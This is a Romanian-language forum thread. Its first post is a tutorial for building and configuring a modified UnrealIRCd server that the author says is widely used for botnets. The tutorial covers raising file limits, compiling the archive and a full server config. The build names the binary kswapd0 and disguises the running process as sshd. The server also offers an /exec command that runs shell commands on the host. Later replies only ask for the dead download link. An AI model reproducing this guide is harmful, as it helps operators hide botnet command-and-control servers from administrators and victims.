ilbr22 Posted October 12, 2012 Report Posted October 12, 2012 (edited) Presupun ca majoritate celor ce inca folosesc ircdul fara servicii folosesc unreal sau bircd.M-am hotarat sa explic si sa public o alta varianta de unreal modata, folosita foarte des pentru botnet.Acesta arhiva de ircd ascunde procesul serverului si are multe facilitati care te vor avantaja daca vrei sa te ascunzi cat de cat de oamenii nepoftiti.Nu este o arhiva pentru ircdurile publice.In primul rand vrem sa scoatem limita serverului:echo "* hard nofile 99999" >> /etc/security/limits.confecho "* soft nofile 99999" >> /etc/security/limits.confsed -i 's/1024/99999/g' /usr/include/bits/typesizes.hulimit -n 99999Instalam gcc, make si opensslapt-get install gcc make openssl -yyum install gcc make openssl -yPunem pe server arhiva.Link: Download Swap for Free | 1gb File Hosting with amazing speed!Dezarhivam:tar xvf swal.l.tar.gz && rm -rf swap.l.tar.gz && cd swap.lConfiguram serverul:./ConfigO sa arate cam asa:Many older operating systems have an insecure TCP/IP stackwhich may be vulnerable to IP spoofing attacks, if you runan operating system that is vulnerable to such attacksenable this option. This option can also be useful to preventblind proxies from connecting (eg: HTTP POST proxies).Do you want to enable the server anti-spoof protection?[No] ->What directory are all the server configuration files in?[/root/swap.l] ->What is the path to the ircd binary including the name of the binary?[/root/swap.l/src/kswapd0] ->Would you like to compile as a hub or as a leaf?Type Hub to select hub and Leaf to select leaf.[Hub] ->What is the hostname of the server running your IRCd?[li317-115] ->What should the default permissions for your configuration files be? (Set this to 0 to disable)It is strongly recommended that you use 0600 to prevent unwanted reading of the file[0600] ->Do you want to support SSL (Secure Sockets Layer) connections?[No] ->Do you want to enable IPv6 support?[No] ->Do you want to enable ziplinks support?[No] ->Do you want to enable remote includes?[No] ->Do you want to enable prefixes for chanadmin and chanowner?This will give +a the & prefix and ~ for +q (just like +o is @)Supported by the major clients (mIRC, xchat, epic, eggdrop, Klient,PJIRC, irssi, CGI:IRC, etc.)This feature should be enabled/disabled network-wide.[Yes] ->What listen() backlog value do you wish to use? Some older servershave problems with more than 5, others work fine with many more.[5] ->How far back do you want to keep the nickname history?[100] ->What is the maximum sendq length you wish to have?[99939900] ->How many buffer pools would you like?This number will be multiplied by MAXSENDQLENGTH.[18] ->How many file descriptors (or sockets) can the IRCd use?[99999] ->Would you like any more parameters to configure?Write them here:[]->Puteti configura serverul dupa bunul plac, eu am ales sa fac tutorialul cu setarile default.Asteptam pana ne apare: __________________________________________________| make ||__________________________________________________|Dupa ce termina dam urmatoarea comanda:makeAsteptam pana ne apare: __________________________________________________| Done ||__________________________________________________|Acum serverul de ircd este instalat, stergem fisierele care nu ne mai trebuiesc:./delcConfiguram serverul:nano httpweb.soStergem tot si adaugam urmatorul config:loadmodule "src/modules/";loadmodule "src/modules/";me { info "psyBNC2.6.4";};admin { "*"; };class clients { pingfreq 120; maxclients 16000; sendq 1505990000; recvq 32100;};class servers { pingfreq 120; maxclients 500; sendq 1505990000; connfreq 513;};class opers { pingfreq 120; maxclients 35; sendq 1505990000; recvq 32100;};allow { ip *@*; hostname *@*; class clients;# optional # password "ParolaLaConnectareaPeServer";# maxperip 1;};oper UserIrcop { class clients; from { userhost *@*; }; password "ParolaIrcop"; flags "OaArDRhwgcLkKbZtBnGNzWHvqdX^"; snomask "kcfjveGnNqSso"; maxlogins 10;};listen *:6667;listen *:7333 { options { ssl; }; };ulines { hub.*;};drpass { restart "ParolaPentruRestart"; die "ParolaPentruDie";};set { network-name "psyBNC2.6.4"; default-server "0"; services-server "0"; stats-server "0"; hiddenhost-prefix "x"; cloak-keys { BEfg79f8dsgDF7fdgFDG79s; 0309FDGD2jhksdfuiE8943h; dESDf890f8X7fds9SEFwf8j; }; hosts { local "psyBNC"; global "psyBNC"; coadmin "psyBNC"; admin "psyBNC"; servicesadmin "psyBNC"; netadmin "psyBNC"; host-on-oper-up "no"; }; help-channel "0"; modes-on-connect "0"; modes-on-oper "+xwigsv-B"; snomask-on-oper "+kejGq"; modes-on-join "+Mmntsu"; restrict-usermodes "BRxpwsg"; restrict-channelmodes "munts"; dns { nameserver; timeout 2s; retries 3; }; options { hide-ulines; }; default-bantime 10d; maxchannelsperuser 35; oper-only-stats "*"; throttle { connections 127; period 1s; }; ssl { certificate "server.cert.pem"; key "server.key.pem"; };};link hub.* { username *; hostname *; bind-ip *; port 8085; hub *; class servers; };Pornim serverul:./swapDaca totul a descurs normal ar trebuii sa apara ceva de genul acesta: v3.2.8.1-m0d-11311 using TRE 0.7.5 (LGPL)[warning] listen with SSL flag enabled on a non SSL compile* Configuration loaded without any problems ..* Dynamic configuration initialized .. booting IRCd.* fprocess: /usr/sbin/sshd---------------------------------------------------------------------Tocmai am terminat de instalat serverul de ircd. Comenzi in mirc:/server localhost:portLocalhost fiind ip-ul serverului tau.La connectare o sa apara:* Connecting to localhost (6667)-x!w@localhost-Login: -* x sets mode: +iwx-Local host: (localhost)Nelogandu-te la server nu vei putea accesa / vedea absolut nimic din ceea ce se intampla pe server.Comanda pentru logare ca ircop:/oper UserIrcop ParolaIrcopDupa logare o sa apara:* x sets mode: +oghaAsNWv-Server notice mask (+kcfjveGnNqSso)-You are now an IRC *** You are Oper on UFO Ship-Atentie: Atunci cand intrati pe un canal folositi urmatoarele comenzi:/join #canal/op Nick #canal/names #canalNick este nickname-ul cu care te-ai connectat la server, daca nu esti sigur de el da-i urmatoarea comanda://whois $meDaca nu vei da comenzile de mai sus fi sigur ca nu o sa vezi absolut nimic pe canalul respectiv.Tutorialul imi apartine 100% . Arhiva nu este facuta de mine, din cate stiu nu are nici un fel de backdoor in ea.Ceva misto: puteti controla serverul pe care arhiva e instalata prin mirc cu urmatoarea comanda (este posbil doar daca sunteti ircop)/exec :uname -aImi cer scuze pentru posibilele greseli gramaticale sau incapacitatea de a formula cum se cuvine explicatiile pe care am vrut sa le aduc. Edited October 12, 2012 by ilbr22 Quote
romanu Posted January 16, 2013 Report Posted January 16, 2013 Numai merge link-ul, il are careva? Quote
mad93 Posted February 14, 2013 Report Posted February 14, 2013 tutorialul este frumos construit noi asteptam inca arhiva Quote